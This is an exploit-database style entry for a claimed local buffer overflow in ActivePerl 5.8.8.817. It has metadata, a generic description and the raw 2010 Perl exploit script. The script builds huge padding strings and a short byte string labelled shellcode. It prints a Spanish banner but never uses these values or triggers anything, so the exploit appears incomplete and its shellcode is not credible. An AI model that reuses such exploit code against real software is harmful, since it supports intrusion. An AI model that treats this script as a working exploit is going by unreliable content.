Local Buffer Overflow ActivePerl

vendor:

ActivePerl

by:

PoisonCode

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ActivePerl

Affected Version From: 5.8.8.817

Affected Version To: 5.8.8.817

Patch Exists: YES

Related CWE: N/A

CPE: a:activestate:activeperl

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Local Buffer Overflow ActivePerl

A local buffer overflow vulnerability exists in ActivePerl version 5.8.8.817. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input to the vulnerable application. Successful exploitation of this vulnerability can result in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of ActivePerl

Source

Exploit-DB raw data:

# Software Link:http://www.activestate.com
# Version: v5.8.8.817
# Platform:Windows

_____    _____                      _ _         
|  __ \ / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Exploit
-------------------------------------------
#!/usr/bin/perl
# File Name :Local Buffer Overflow ActivePerl
# Author :PoisonCode
# Exploit Title: Local Buffer Overflow ActivePerl
# Date:09/06/2010
# Author:PoisonCode
# Site  :http://www.activestate.com
# Version: 5.8.8.817
# Tested on: Windows
$file="Exploit Perl Version 5.8.8.817";
print " ============================================\n";
print " =     Local Buffer Overflow ActivePerl      =\n";
print " =        Version: 5.8.8.817                 =\n";
print " =            Autor:PoisonCode               =\n";
print " =    Web :PanamaSecurity.blogspot.com       =\n";
print " =============================================\n";
print "\n";
print " Espere Mientras Trabaja el Exploit\n";
my $fruty="\x87" x 999999999;
my $loops="\x67" x 999999999;
my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d";